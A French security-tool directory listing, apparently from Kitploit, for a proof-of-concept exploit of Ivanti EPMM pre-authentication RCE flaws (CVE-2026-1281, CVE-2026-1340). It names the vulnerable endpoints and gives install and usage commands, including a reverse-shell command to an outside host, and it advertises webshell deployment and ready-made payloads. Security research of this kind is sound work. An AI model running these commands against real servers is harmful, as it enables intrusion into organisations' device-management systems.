Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — Preuve de concept pour CVE-2026-1281 et CVE-2026-1340 - RCE pré-authentification dans Ivanti EPMM via l'expansion arithmétique de Bash | Kitploit
Outils/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Preuve de concept pour CVE-2026-1281 et CVE-2026-1340 - RCE pré-authentification dans Ivanti EPMM via l'expansion arithmétique de Bash

Voir le dépôt
6123il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ DISCLAIMER: Ce PoC est fourni uniquement à des fins éducatives et de recherche en sécurité. L'utilisation sans autorisation explicite est illégale.

🎯 Description

Proof of Concept (PoC) complet pour l'exploitation des vulnérabilités CVE-2026-1281 et CVE-2026-1340 affectant Ivanti Endpoint Manager Mobile (EPMM). Ces vulnérabilités permettent une exécution de code arbitraire à distance (RCE) sans authentification via un mécanisme de Bash Arithmetic Expansion.

Vulnérabilités

  • CVE-2026-1281 : Code injection dans l'endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Code injection dans l'endpoint /mifs/c/aftstore/fob/
  • Score CVSS : 9.8 (Critical)
  • Exploitation : Active in-the-wild (Zero-Day)

🚀 Fonctionnalités

  • ✅ Framework de validation automatisé (8 tests)
  • ✅ Exploitation Pre-Auth RCE
  • ✅ Reverse shell automatique
  • ✅ Déploiement de webshell
  • ✅ 50+ payloads prêts à l'emploi
  • ✅ Scripts de détection pour Blue Team
  • ✅ Documentation complète

📦 Installation

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 Utilisation Rapide

# Test de vulnérabilité
python3 exploit.py -t https://target.com -c

# Validation RCE
python3 exploit.py -t https://target.com --test-rce

# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 Documentation

  • README complet - Documentation technique détaillée
  • Guide d'utilisation - Guide étape par étape
  • Payloads - Collection de 50+ payloads
  • Guide Red Team - Scénarios opérationnels

🔗 Références

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs Analysis
  • CVE-2026-1281
  • CVE-2026-1340

👤 Auteur

Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist

LinkedIn

⚖️ Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

🙏 Remerciements

  • CERT-FR pour l'alerte rapide
  • Watchtowr Labs pour l'analyse technique
  • La communauté cybersécurité
Télécharger l’outil